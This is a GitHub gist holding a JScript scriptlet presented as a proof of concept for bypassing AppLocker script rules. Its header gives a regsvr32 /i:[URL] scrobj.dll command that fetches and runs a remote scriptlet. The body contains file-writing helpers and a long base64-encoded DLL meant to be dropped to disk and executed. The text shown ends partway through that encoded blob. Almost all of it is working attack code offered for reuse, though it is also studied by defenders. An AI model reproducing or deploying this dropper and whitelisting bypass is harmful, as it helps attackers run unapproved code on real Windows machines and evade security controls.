Create a gist now

Instantly share code, notes, and snippets.

@subTee /Dropper.Sct Secret
Last active Apr 11, 2017

What would you like to do?
Drops and Executes SCT - Bypass AppLocker Script Rules -- C:\Windows\SysWow64\regsvr32.exe /s /u /i:[THIS URL] scrobj.dll
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
var fsoForReading = 1;
var fsoForWriting = 2;
// Reference MSDN https://msdn.microsoft.com/en-us/library/aa265347(v=vs.60).aspx
function sleep(delay)
{
var start = new Date().getTime();
while (new Date().getTime() < start + delay);
}
function LoadStringFromFile(filename)
{
var fso, f, data;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile(filename, fsoForReading, true);
data = f.ReadAll();
f.Close();
return data;
}
function SaveStringToFile(filename, textString)
{
var fso, f;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile(filename, fsoForWriting, true);
f.Write(textString);
f.Close();
}
// Example File Prep
// Output of 'certuil.exe /encode AllTheThingsx64.dll AllTheThingsx64.txt
// Why bother writing a terrible Base64 encode/decode routine, when certutil.exe will do it for you.
//
var x86dllEncoded = "-----BEGIN CERTIFICATE-----\
TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0K\
JLQJugABzSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20A\
UEUAAEwBBwA1dfhIAAAAAAAAAADgAA4hCwEAJgAYAAAAGAAAAAAAAAAQAAAAEAAA\
ADAAAAAAABAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAkAAAAAQAAJTZAAACAAAA\
AAAQAAAAAQAAABAAABAAAAAAAAAQAAAAAHAAALwAAACEYAAAZAAAAABQAACgAwAA\
AAAAAAAAAAAAAAAAAAAAAACAAACgAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6GAAAGgAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAABjb2RlAAAAAHAXAAAAEAAAABgAAAAEAAAAAAAAAAAAAAAAAAAgAABg\
ZGF0YQAAAABQBAAAADAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAwGNvbnN0AAAA\
gAcAAABAAAAACAAAAB4AAAAAAAAAAAAAAAAAAEAAAEAucnNyYwAAAKADAAAAUAAA\
AAQAAAAmAAAAAAAAAAAAAAAAAABAAABALmlkYXRhAABiAwAAAGAAAAAEAAAAKgAA\
AAAAAAAAAAAAAAAAIAAAYC5lZGF0YQAAvAAAAABwAAAAAgAAAC4AAAAAAAAAAAAA\
AAAAAEAAAEAucmVsb2MAAKACAAAAgAAAAAQAAAAwAAAAAAAAAAAAAAAAAABAAABC\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
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\
VVZXU4nlg+wEg30YAHRgi10YizNT/1YEizU4MAAQiz0wMAAQgf/4HAAQd0tqAP91\
IP91HGoB6N77//9yKVBSUf91GI8Gj0YEj0YIj0YMg8YQiTU4MAAQifgDPTQwABCJ\
PTAwABD4iexbX15dwhAAuA4AAoD56++4CgACgPnr51VWV1OJ5YPsMInji3UUi1YI\
i04EiU30ichAweAEKcSJZeyLRRiDwASLPlBTUVJX6KkAAACJTfzHRfAAAAAAx0X4\
AAAAAIsfZsdF3AAAx0XkAAAAAFWDBCTUagBqAWhGMAAQaJhAABBX/1MUhcB1Sf9F\
9GoAagBVgwQk3FWDBCTsagFqAGiYQAAQ/3XUV/9TGIXAdUWDfgwAdA//dgxVgwQk\
3OikAQAAcjCLTfyD6QSJ7FtfXl3CCABqAGoAVYMEJNxVgwQk7GoBagBomEAAEGoA\
V/9TGIXAdLsxwOvMVVZXU4nlg+wEi00ci10gg+sQ/3UUagmPA49DCOMui30ki3UY\
/K3B4AIFPEUAEIsQhdJ0JIPrEFFXU1LoLwcAAFlyDInH4t6J+StNJDHA+InsW19e\
XcIUALgFAAKA+evvjwQMAczDieBQaFAwABDosP7//+vrieBQaGAwABDoof7//+vc\
ieBQaHAwABDokv7//+vNieBQaIAwABDog/7//+u+ieBQaJAwABDodP7//+uvieBQ\
aKAwABDoZf7//+ugieBQaLAwABDoVv7//+uRieBQaMAwABDoR/7//+uCieBQaNAw\
ABDoOP7//+lw////ieBQaOAwABDoJv7//+le////ieBQaPAwABDoFP7//+lM////\
ieBQaAAxABDoAv7//+k6////ieBQaBAxABDo8P3//+ko////ieBQaCAxABDo3v3/\
/+kW////ieBQaDAxABDozP3//+kE////ieBQaEAxABDouv3//+ny/v//VVZXU4nl\
g+wEi10Ui3UYZoM7CXRDiw3YQQAQicpmiwO/yEEAEPzyZq91QynKSsHiAosGweAF\
AdCNgNxBABCLAIXAdCpqAGoAU1DoNwAAAInsW19eXcIIAItDCGaDeCwDdAdmg3gs\
BXWsjVgs66e4BQACgPmJ7FtfXl3CCACQkJCQkJCQkJBVVldTieWD7BSLdRiLRgiL\
fRz/VRRyBoX/eAKJ+InsW19eXcIQACX/AAAA6wGYg+8EeAKJB/jDm9vj2UYI6wab\
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\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
RHluYW1pY1dyYXBwZXJYAHs4OTU2NTI3NS1BNzE0LTRhNDMtOTEyRS05NzhCOTM1\
RURDQ0N9AFNvZnR3YXJlXENsYXNzZXNcRHluYW1pY1dyYXBwZXJYAFNvZnR3YXJl\
XENsYXNzZXNcQ0xTSURcezg5NTY1Mjc1LUE3MTQtNGE0My05MTJFLTk3OEI5MzVF\
RENDQ30AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAARgEAAAAAAAAA\
wAAAAAAAAEYABAIAAAAAAMAAAAAAAABGdVJWiRSnQ0qRLpeLk17czK8SABD2EgAQ\
/BIAEAITABBsEwAQ6EAAEI4TABDkEwAQ9BMAECUUABAtFAAQNRQAEK4UABBBZHZh\
cGkzMi5kbGwAUmVnQ3JlYXRlS2V5RXhBAFJlZ1NldFZhbHVlRXhBAFJlZ0Nsb3Nl\
S2V5AEluUHJvY1NlcnZlcjMyACVzXCVzAENMU0lEACVzXCVzAHNobHdhcGkuZGxs\
AFNIRGVsZXRlS2V5QQAAAGwAaAB1AHAAbgB0AGMAYgBkAGYAdwBzAHoATABIAFUA\
UABOAFQAQwBCAEQARgBXAFMAWgAaAAAAAwACABEABQAEAAkAAAAIAAgAAAC+HQAQ\
vR0AELYdABDPHQAQxx0AEAAAAAAAAAAAAAAAAPgdABD3HQAQ8B0AEAkeABABHgAQ\
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\
aQBvAG4AIABjAGEAbABsAHMAIABpAG4AIABKAFMAYwByAGkAcAB0ACAAYQBuAGQA\
IABWAEIAUwBjAHIAaQBwAHQALgAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEA\
bQBlAAAAAAAAAAAAVgAXAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4A\
AAAAAEQAeQBuAGEAbQBpAGMAVwByAGEAcABwAGUAcgBYACAAbwBiAGoAZQBjAHQA\
AAAAACoABQABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAAMAAAAAAA\
MgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABkAHkAbgB3AHIAYQBwAHgA\
AAAAAEoAEwABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAKkAIABZAHUA\
cgBpACAAUABvAHAAbwB2ACwAIAAyADAAMAA4AAAAAABCAA0AAQBPAHIAaQBnAGkA\
bgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZAB5AG4AdwByAGEAcAB4AC4AZABsAGwA\
AAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAARAB5AG4AYQBtAGkA\
YwBXAHIAYQBwAHAAZQByAFgAAAAuAAUAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMA\
aQBvAG4AAAAxAC4AMAAwAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A\
AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAACQTkBAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/yXoYAAQ/yXsYAAQ/yXwYAAQ/yX0YAAQ/yX4YAAQ/yX8YAAQ/yUAYQAQ/yUEYQAQ\
/yUIYQAQ/yUMYQAQ/yUQYQAQ/yUUYQAQ/yUYYQAQ/yUcYQAQ/yUkYQAQ/yUoYQAQ\
/yUsYQAQ/yUwYQAQ/yU4YQAQ/yVAYQAQ/yVEYQAQ/yVIYQAQUGEAAAAAAAAAAAAA\
uGEAAOhgAACMYQAAAAAAAAAAAADSYgAAJGEAAKBhAAAAAAAAAAAAAAhjAAA4YQAA\
